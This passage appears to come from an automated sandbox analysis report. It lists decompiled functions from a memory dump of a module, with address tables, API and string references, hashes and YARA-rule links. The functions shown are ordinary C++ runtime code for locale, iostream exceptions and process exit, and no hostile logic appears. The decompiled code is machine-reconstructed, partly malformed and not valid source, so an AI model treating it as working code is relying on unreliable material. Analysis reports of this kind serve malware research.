										 *(_t990 - 4) = 1;
										E6D478A0B(__eflags, _t923);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t923 + 4))))();
										 *0x6d53fdf8 = _t923;
										goto L12;
									}
								} else {
									_t923 = _t946;
									goto L12;
								}
							}
						} else {
							_t922 =  *(_t990 - 0x10);
							 *(_t990 - 0x10) = _t922;
							 *(_t990 - 4) = 1;
							E6D478A0B(__eflags, _t922);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t922 + 4))))();
							 *0x6d53fe18 = _t922;
							goto L5;
						}
					} else {
						_t922 = _t945;
						goto L5;
					}
				}
			}

0x6d48037a
0x6d48037a
0x6d48037a
0x6d48037a
0x6d480381
0x6d48038b
0x6d480390
0x6d48039b
0x6d48039f
0x6d4803a2
0x6d4803a7
0x6d4803ab
0x6d4803b0
0x6d4803b4
0x6d4803f9
0x6d4803fc
0x6d480408
0x6d4803b6
0x6d4803b8
0x6d4803be
0x6d4803c4
0x6d4803cc
0x6d4803cf
0x6d48040c
0x6d48041a
0x6d48041f
0x6d480420
0x6d480427
0x6d480431
0x6d480436
0x6d480441
0x6d480445
0x6d480448
0x6d48044d
0x6d480456
0x6d480458
0x6d48045a
0x6d48049f
0x6d4804a2
0x6d4804ae
0x6d48045c
0x6d48045c
0x6d48045e
0x6d480464
0x6d48046a
0x6d480472
0x6d480475
0x6d4804b2
0x6d4804c0
0x6d4804c5
0x6d4804c6
0x6d4804cd
0x6d4804d7
0x6d4804dc
0x6d4804e7
0x6d4804eb
0x6d4804ee
0x6d4804f3
0x6d4804fc
0x6d4804fe
0x6d480500
0x6d480545
0x6d480548
0x6d480554
0x6d480502
0x6d480502
0x6d480504
0x6d48050a
0x6d480510
0x6d480518
0x6d48051b
0x6d480558
0x6d480566
0x6d48056b
0x6d48056c
0x6d480573
0x6d48057d
0x6d480582
0x6d48058d
0x6d480591
0x6d480594
0x6d480599
0x6d4805a2
0x6d4805a4
0x6d4805a6
0x6d4805eb
0x6d4805ee
0x6d4805fa
0x6d4805a8
0x6d4805a8
0x6d4805aa
0x6d4805b0
0x6d4805b6
0x6d4805be
0x6d4805c1
0x6d4805fe
0x6d48060c
0x6d480611
0x6d480612
0x6d480619
0x6d480623
0x6d480628
0x6d480633
0x6d480637
0x6d48063a
0x6d48063f
0x6d480648
0x6d48064a
0x6d48064c
0x6d480691
0x6d480694
0x6d4806a0
0x6d48064e
0x6d48064e
0x6d480650
0x6d480656
0x6d48065c
0x6d480664
0x6d480667
0x6d4806a4
0x6d4806b2
0x6d4806b7
0x6d4806b8
0x6d4806bf
0x6d4806c9
0x6d4806ce
0x6d4806d9
0x6d4806dd
0x6d4806e0
0x6d4806e5
0x6d4806ee
0x6d4806f0
0x6d4806f2
0x6d480737
0x6d48073a
0x6d480746
0x6d4806f4
0x6d4806f4
0x6d4806f6
0x6d4806fc
0x6d480702
0x6d48070a
0x6d48070d
0x6d48074a
0x6d480758
0x6d48075d
0x6d48075e
0x6d480765
0x6d48076f
0x6d480774
0x6d48077f
0x6d480783
0x6d480786
0x6d48078b
0x6d480794
0x6d480796
0x6d480798
0x6d4807dd
0x6d4807e0
0x6d4807ec
0x6d48079a
0x6d48079a
0x6d48079c
0x6d4807a2
0x6d4807a8
0x6d4807b0
0x6d4807b3
0x6d4807f0
0x6d4807fe
0x6d480803
0x6d480804
0x6d48080b
0x6d480815
0x6d48081a
0x6d480825
0x6d480829
0x6d48082c
0x6d480831
0x6d48083a
0x6d48083c
0x6d48083e
0x6d480883
0x6d480886
0x6d480892
0x6d480840
0x6d480840
0x6d480842
0x6d480848
0x6d48084e
0x6d480856
0x6d480859
0x6d480896
0x6d4808a4
0x6d4808a9
0x6d4808aa
0x6d4808b1
0x6d4808bb
0x6d4808c0
0x6d4808cb
0x6d4808cf
0x6d4808d2
0x6d4808d7
0x6d4808e0
0x6d4808e2
0x6d4808e4
0x6d480929
0x6d48092c
0x6d480938
0x6d4808e6
0x6d4808e6
0x6d4808e8
0x6d4808ee
0x6d4808f4
0x6d4808fc
0x6d4808ff
0x6d48093c
0x6d48094a
0x6d48094f
0x6d480950
0x6d480957
0x6d480961
0x6d480966
0x6d480971
0x6d480975
0x6d480978
0x6d48097d
0x6d480986
0x6d480988
0x6d48098a
0x6d4809cf
0x6d4809d2
0x6d4809de
0x6d48098c
0x6d48098c
0x6d48098e
0x6d480994
0x6d48099a
0x6d4809a2
0x6d4809a5
0x6d4809e2
0x6d4809f0
0x6d4809f5
0x6d4809f6
0x6d4809fd
0x6d480a07
0x6d480a0c
0x6d480a17
0x6d480a1b
0x6d480a1e
0x6d480a23
0x6d480a2c
0x6d480a2e
0x6d480a30
0x6d480a75
0x6d480a78
0x6d480a84
0x6d480a32
0x6d480a32
0x6d480a34
0x6d480a3a
0x6d480a40
0x6d480a48
0x6d480a4b
0x6d480a88
0x6d480a96
0x6d480a9b
0x6d480a9c
0x6d480aa3
0x6d480aad
0x6d480ab2
0x6d480abd
0x6d480ac1
0x6d480ac4
0x6d480ac9
0x6d480ad2
0x6d480ad4
0x6d480ad6
0x6d480b1b
0x6d480b1e
0x6d480b2a
0x6d480ad8
0x6d480ad8
0x6d480ada
0x6d480ae0
0x6d480ae6
0x6d480aee
0x6d480af1
0x6d480b2e
0x6d480b3c
0x6d480b41
0x6d480b42
0x6d480b49
0x6d480b53
0x6d480b58
0x6d480b63
0x6d480b67
0x6d480b6a
0x6d480b6f
0x6d480b78
0x6d480b7a
0x6d480b7c
0x6d480bc1
0x6d480bc4
0x6d480bd0
0x6d480b7e
0x6d480b7e
0x6d480b80
0x6d480b86
0x6d480b8c
0x6d480b94
0x6d480b97
0x6d480bd4
0x6d480be2
0x6d480be7
0x6d480be8
0x6d480bef
0x6d480bf9
0x6d480bfe
0x6d480c09
0x6d480c0d
0x6d480c10
0x6d480c15
0x6d480c1e
0x6d480c20
0x6d480c22
0x6d480c67
0x6d480c6a
0x6d480c76
0x6d480c24
0x6d480c24
0x6d480c26
0x6d480c2c
0x6d480c32
0x6d480c3a
0x6d480c3d
0x6d480c7a
0x6d480c88
0x6d480c8d
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cc4
0x6d480cc6
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26
0x6d480b99
0x6d480b99
0x6d480b9c
0x6d480ba0
0x6d480ba4
0x6d480bb1
0x6d480bb9
0x6d480bbb
0x00000000
0x6d480bbb
0x6d480b82
0x6d480b82
0x00000000
0x6d480b82
0x6d480b80
0x6d480af3
0x6d480af3
0x6d480af6
0x6d480afa
0x6d480afe
0x6d480b0b
0x6d480b13
0x6d480b15
0x00000000
0x6d480b15
0x6d480adc
0x6d480adc
0x00000000
0x6d480adc
0x6d480ada
0x6d480a4d
0x6d480a4d
0x6d480a50
0x6d480a54
0x6d480a58
0x6d480a65
0x6d480a6d
0x6d480a6f
0x00000000
0x6d480a6f
0x6d480a36
0x6d480a36
0x00000000
0x6d480a36
0x6d480a34
0x6d4809a7
0x6d4809a7
0x6d4809aa
0x6d4809ae
0x6d4809b2
0x6d4809bf
0x6d4809c7
0x6d4809c9
0x00000000
0x6d4809c9
0x6d480990
0x6d480990
0x00000000
0x6d480990
0x6d48098e
0x6d480901
0x6d480901
0x6d480904
0x6d480908
0x6d48090c
0x6d480919
0x6d480921
0x6d480923
0x00000000
0x6d480923
0x6d4808ea
0x6d4808ea
0x00000000
0x6d4808ea
0x6d4808e8
0x6d48085b
0x6d48085b
0x6d48085e
0x6d480862
0x6d480866
0x6d480873
0x6d48087b
0x6d48087d
0x00000000
0x6d48087d
0x6d480844
0x6d480844
0x00000000
0x6d480844
0x6d480842
0x6d4807b5
0x6d4807b5
0x6d4807b8
0x6d4807bc
0x6d4807c0
0x6d4807cd
0x6d4807d5
0x6d4807d7
0x00000000
0x6d4807d7
0x6d48079e
0x6d48079e
0x00000000
0x6d48079e
0x6d48079c
0x6d48070f
0x6d48070f
0x6d480712
0x6d480716
0x6d48071a
0x6d480727
0x6d48072f
0x6d480731
0x00000000
0x6d480731
0x6d4806f8
0x6d4806f8
0x00000000
0x6d4806f8
0x6d4806f6
0x6d480669
0x6d480669
0x6d48066c
0x6d480670
0x6d480674
0x6d480681
0x6d480689
0x6d48068b
0x00000000
0x6d48068b
0x6d480652
0x6d480652
0x00000000
0x6d480652
0x6d480650
0x6d4805c3
0x6d4805c3
0x6d4805c6
0x6d4805ca
0x6d4805ce
0x6d4805db
0x6d4805e3
0x6d4805e5
0x00000000
0x6d4805e5
0x6d4805ac
0x6d4805ac
0x00000000
0x6d4805ac
0x6d4805aa
0x6d48051d
0x6d48051d
0x6d480520
0x6d480524
0x6d480528
0x6d480535
0x6d48053d
0x6d48053f
0x00000000
0x6d48053f
0x6d480506
0x6d480506
0x00000000
0x6d480506
0x6d480504
0x6d480477
0x6d480477
0x6d48047a
0x6d48047e
0x6d480482
0x6d48048f
0x6d480497
0x6d480499
0x00000000
0x6d480499
0x6d480460
0x6d480460
0x00000000
0x6d480460
0x6d48045e
0x6d4803d1
0x6d4803d1
0x6d4803d4
0x6d4803d8
0x6d4803dc
0x6d4803e9
0x6d4803f1
0x6d4803f3
0x00000000
0x6d4803f3
0x6d4803ba
0x6d4803ba
0x00000000
0x6d4803ba
0x6d4803b8

APIs

__EH_prolog3.LIBCMT ref: 6D480381
std::_Lockit::_Lockit.LIBCPMT ref: 6D48038B

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

codecvt.LIBCPMT ref: 6D4803C5
std::_Facet_Register.LIBCPMT ref: 6D4803DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4803FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48041A

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 2494126e5f2ecdba6ad5ddc379346ff9048f667f21834cef9a29b74883c5474b
Instruction ID: 2f258415c9a8f746fcb9e5d6df13fc1a86bb0639220ee111e2f22b56d37eb188
Opcode Fuzzy Hash: 2494126e5f2ecdba6ad5ddc379346ff9048f667f21834cef9a29b74883c5474b
Instruction Fuzzy Hash: D511AC7290422A8BCF14DBA6C890EEE7775AF85764F26040DD610AB391DF74DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D453D60, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E6D453D60(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4, char _a8) {
				char _v24;
				char _v32;
				signed int _t14;
				void* _t17;
				void* _t23;
				signed char _t26;
				char* _t27;
				void* _t28;
				void* _t29;
				char* _t33;
				void* _t45;

				_t29 = __edi;
				_t23 = __ebx;
				_t14 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t14;
				_t26 =  *(__ecx + 0x10) & _t14;
				if(_t26 == 0) {
					return _t14;
				} else {
					if(_a8 != 0) {
						E6D4924F4(0, 0);
					}
					if((_t26 & 0x00000004) == 0) {
						_t33 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
					} else {
						_t33 = "ios_base::badbit set";
					}
					_t17 = E6D4533A0(_t23, _t28, _t29, _t45,  &_v32, 1);
					_t27 =  &_v24;
					E6D453C40(_t23, _t27, _t29, _t33, _t45, _t33, _t17);
					E6D4924F4( &_v32, 0x6d532a30);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *((intOrPtr*)(_t27 + 0xc));
				}
			}

0x6d453d60
0x6d453d60
0x6d453d6c
0x6d453d6f
0x6d453d76
0x6d453d78
0x6d453d86
0x6d453d7a
0x6d453d7e
0x6d453d8d
0x6d453d8d
0x6d453d95
0x6d453dab
0x6d453d97
0x6d453d97
0x6d453d97
0x6d453db5
0x6d453dbd
0x6d453dc3
0x6d453dd2
0x6d453dd7
0x6d453dd8
0x6d453dd9
0x6d453dda
0x6d453ddb
0x6d453ddc
0x6d453ddd
0x6d453dde
0x6d453ddf
0x6d453de3
0x6d453de3

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6D453D8D

Part of subcall function 6D4924F4: RaiseException.KERNEL32(?,?,6D479030,6D4D78BB,00000000,?,00000000,?,?,?,?,6D479030,6D4D78BB,6D5308C4,?,6D4D78BB), ref: 6D492554

__CxxThrowException@8.LIBVCRUNTIME ref: 6D453DD2

Strings

ios_base::badbit set, xrefs: 6D453D97, 6D453DC2
ios_base::failbit set, xrefs: 6D453C5F, 6D453DA1
ios_base::eofbit set, xrefs: 6D453DA6

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3476068407-1866435925
Opcode ID: 563c7f6437416232ccb65ec726f1759e41f72fa4395bd165556e5ab48eff97b2
Instruction ID: c962dc36d7df6517e4e8b89c470fb4bae7a4d8d95f1a26dd41865fa0fd59aad2
Opcode Fuzzy Hash: 563c7f6437416232ccb65ec726f1759e41f72fa4395bd165556e5ab48eff97b2
Instruction Fuzzy Hash: 510149738182447BCB14CD58C84AFA973D86B41214F54855DFB949B182FB32ED19C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BAE11, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6D4BADA7,00000003,?,6D4BAD47,00000003,6D532230,0000000C,6D4BAE8C,00000003,00000002), ref: 6D4BAE31
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D4BAE44
FreeLibrary.KERNEL32(00000000,?,?,?,6D4BADA7,00000003,?,6D4BAD47,00000003,6D532230,0000000C,6D4BAE8C,00000003,00000002,00000000), ref: 6D4BAE67

Strings

CorExitProcess, xrefs: 6D4BAE3C
mscoree.dll, xrefs: 6D4BAE2A

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 7a1812a815ed392977ac766b88d7ca70844b1d335c3078da434e356f2a8ce4e0
Instruction ID: e02290dc86b04233e2f2b8b2e8679f6edb898cb4b566691209f55b60665c633d
Opcode Fuzzy Hash: 7a1812a815ed392977ac766b88d7ca70844b1d335c3078da434e356f2a8ce4e0
Instruction Fuzzy Hash: AEF06231900208BBDF119FA5CC49FAEBFF5EF09711F114169F905A6640DB718E40CAD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D471D90, Relevance: 7.8, APIs: 5, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E6D471D90(void* __ecx, signed int _a4, signed char _a7, signed int _a8) {
				signed short _v0;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed char _v20;
				unsigned int _v24;
				signed char _v28;
				signed int _v32;
				signed short _v40;
				char _v60;
				unsigned int _v64;
				signed char _v68;
				void* __esi;
				void* __ebp;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t145;
				signed int _t148;
				unsigned int _t151;
				signed int _t152;
				signed char _t154;
				signed int _t155;
				signed int _t158;
				signed char _t159;
				signed int _t160;
				signed int _t161;
				void* _t163;
				signed char _t164;
				signed char _t167;
				signed int _t168;
				signed int _t170;
				signed char _t174;
				intOrPtr _t176;
				signed char _t177;
				void* _t180;
				signed char _t186;
				intOrPtr _t190;
				signed int _t191;
				signed int _t197;
				signed int _t199;
				intOrPtr* _t208;
				signed char _t209;
				signed int _t214;
				signed int _t216;
				signed char _t217;
				intOrPtr* _t219;
				intOrPtr* _t220;
				void* _t222;
				signed char _t224;
				signed int _t225;
				intOrPtr _t226;
				signed char _t231;
				signed int _t233;
				signed short _t234;
				signed char* _t238;
				intOrPtr* _t239;
				void* _t245;
				void* _t246;
				signed int _t247;
				void* _t248;

				_push(0xffffffff);
				_push(E6D4FE0CD);
				_push( *[fs:0x0]);
				_t246 = _t245 - 0x10;
				_t139 =  *0x6d534074; // 0x286e79ba
				_push(_t139 ^ _t243);
				_t141 =  &_v16;
				 *[fs:0x0] = _t141;
				_t222 = __ecx;
				if(( *(__ecx + 8) & 0x00000100) == 0) {
					_t186 = _a4 & 0x000000ff;
					_t210 = _a8 & 0x000000ff;
					_v20 = _t186;
				} else {
					_t208 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)) + 4));
					_t176 =  *_t208;
					_t219 =  *((intOrPtr*)(_t176 + 0x10));
					if(_t176 != 0x6d50035c) {
						_t177 =  *_t219(_a4);
					} else {
						_t8 = _t208 + 8; // 0x1c
						_t177 = E6D47A4F6(_a4 & 0x000000ff, _t8);
						_t246 = _t246 + 8;
					}
					_v20 = _t177;
					_t209 =  *( *((intOrPtr*)(_t222 + 0xc)) + 4);
					_t180 =  *_t209;
					_t220 =  *((intOrPtr*)(_t180 + 0x10));
					if(_t180 != 0x6d50035c) {
						_t141 =  *_t220(_a8);
						_t186 = _v20;
						_t210 = _t141;
					} else {
						_t14 = _t209 + 8; // 0x1c
						_t141 = E6D47A4F6(_a8 & 0x000000ff, _t14);
						_t186 = _v20;
						_t246 = _t246 + 8;
						_t210 = _t141;
					}
				}
				_t231 =  *(_t222 + 4);
				_a8 = _t210;
				_a4 = _t231;
				if(_t186 > _t210) {
					L38:
					 *[fs:0x0] = _v16;
					return _t141;
				} else {
					while(_t210 <  *((intOrPtr*)(_t222 + 0x10))) {
						_t217 =  *(_t231 + 0x18);
						_t254 = _t217;
						if(_t217 == 0) {
							_push(0x20);
							_t174 = E6D4906EF(_t186, _t217, _t231, _t254);
							_t246 = _t246 + 4;
							_v28 = _t174;
							_v8 = 0;
							asm("xorps xmm0, xmm0");
							asm("movups [eax], xmm0");
							asm("movups [eax+0x10], xmm0");
							_v8 = 0xffffffff;
							_t217 = _t174;
							_t186 = _v20;
							 *(_t231 + 0x18) = _t174;
						}
						_t141 = _v20 & 0x00000007;
						asm("bts ecx, eax");
						 *(_t217 + (_t186 >> 3)) =  *(_t217 + (_t186 >> 3)) & 0x000000ff;
						_t210 = _a8;
						_t186 = _v20 + 1;
						_v20 = _t186;
						if(_t186 <= _t210) {
							continue;
						} else {
							 *[fs:0x0] = _v16;
							return _t141;
						}
						goto L57;
					}
					__eflags = _t210 - _t186;
					if(_t210 < _t186) {
						goto L38;
					} else {
						_t141 = _t210 - _t186;
						__eflags = _t141 -  *((intOrPtr*)(_t222 + 0x14));
						if(_t141 >=  *((intOrPtr*)(_t222 + 0x14))) {
							_t233 =  *(_t231 + 0x20);
							__eflags = _t233;
							if(__eflags != 0) {
								_t224 = _a4;
							} else {
								_push(0xc);
								_t158 = E6D4906EF(_t186, _t210, _t233, __eflags);
								_t246 = _t246 + 4;
								_v32 = _t158;
								_v8 = 2;
								 *_t158 = _t233;
								 *(_t158 + 4) = _t233;
								 *(_t158 + 8) = _t233;
								_v8 = 0xffffffff;
								_t233 = _t158;
								_t224 = _a4;
								 *(_t224 + 0x20) = _t158;
							}
							_t143 =  *(_t233 + 4);
							__eflags =  *_t233 - _t143;
							if( *_t233 > _t143) {
								L34:
								_t186 =  *(_t233 + 8);
								 *((char*)(_t186 +  *(_t233 + 4))) = _v20;
								 *(_t233 + 4) =  *(_t233 + 4) + 1;
								_t233 =  *(_t224 + 0x20);
								_t225 =  *(_t233 + 4);
								__eflags =  *_t233 - _t225;
								if( *_t233 > _t225) {
									L37:
									_t141 =  *(_t233 + 4);
									 *((char*)( *(_t233 + 8) + _t141)) = _a8;
									_t100 = _t233 + 4;
									 *_t100 =  *(_t233 + 4) + 1;
									__eflags =  *_t100;
									goto L38;
								} else {
									_t224 = _t225 + 0x10;
									_push(_t224);
									_push( *(_t233 + 8));
									_t145 = E6D4AAEB9(_t186);
									_t247 = _t246 + 8;
									__eflags = _t145;
									if(__eflags == 0) {
										goto L43;
									} else {
										 *(_t233 + 8) = _t145;
										 *_t233 = _t224;
										goto L37;
									}
								}
							} else {
								_t154 = _t143 + 0x10;
								_push(_t154);
								_push( *(_t233 + 8));
								_a4 = _t154;
								_t155 = E6D4AAEB9(_t186);
								_t247 = _t246 + 8;
								__eflags = _t155;
								if(__eflags == 0) {
									goto L42;
								} else {
									 *(_t233 + 8) = _t155;
									 *_t233 = _a4;
									goto L34;
								}
							}
						} else {
							__eflags = _t186 - _t210;
							if(_t186 > _t210) {
								goto L38;
							} else {
								do {
									__eflags =  *(_t222 + 8) & 0x00000100;
									_a7 = _t186;
									_v24 = _t186;
									if(( *(_t222 + 8) & 0x00000100) != 0) {
										_t210 =  *( *((intOrPtr*)(_t222 + 0xc)) + 4);
										_t163 =  *_t210;
										_t239 =  *((intOrPtr*)(_t163 + 0x10));
										__eflags = _t163 - 0x6d50035c;
										if(_t163 != 0x6d50035c) {
											_t186 = _t210;
											_t164 =  *_t239(_v24);
										} else {
											_t45 = _t210 + 8; // 0x1c
											_t164 = E6D47A4F6(_t186 & 0x000000ff, _t45);
											_t246 = _t247 + 8;
										}
										_a7 = _t164;
									}
									_t159 =  *(_t222 + 4);
									_v28 = _t159;
									_t233 =  *(_t159 + 0x1c);
									__eflags = _t233;
									if(__eflags == 0) {
										_push(0xc);
										_t170 = E6D4906EF(_t186, _t210, _t233, __eflags);
										_t246 = _t246 + 4;
										_v32 = _t170;
										_v8 = 1;
										 *_t170 = _t233;
										 *(_t170 + 4) = _t233;
										 *(_t170 + 8) = _t233;
										_v8 = 0xffffffff;
										 *(_v28 + 0x1c) = _t170;
										_t233 = _t170;
									}
									_t160 =  *(_t233 + 4);
									__eflags =  *_t233 - _t160;
									if( *_t233 > _t160) {
										goto L26;
									} else {
										_t167 = _t160 + 0x10;
										_push(_t167);
										_push( *(_t233 + 8));
										_v28 = _t167;
										_t168 = E6D4AAEB9(_t186);
										_t247 = _t246 + 8;
										__eflags = _t168;
										if(__eflags == 0) {
											L42:
											E6D478FB7(__eflags);
											L43:
											E6D478FB7(__eflags);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(0xffffffff);
											_push(E6D4FE0FF);
											_push( *[fs:0x0]);
											_t248 = _t247 - 0xc;
											_push(_t233);
											_push(_t224);
											_t148 =  *0x6d534074; // 0x286e79ba
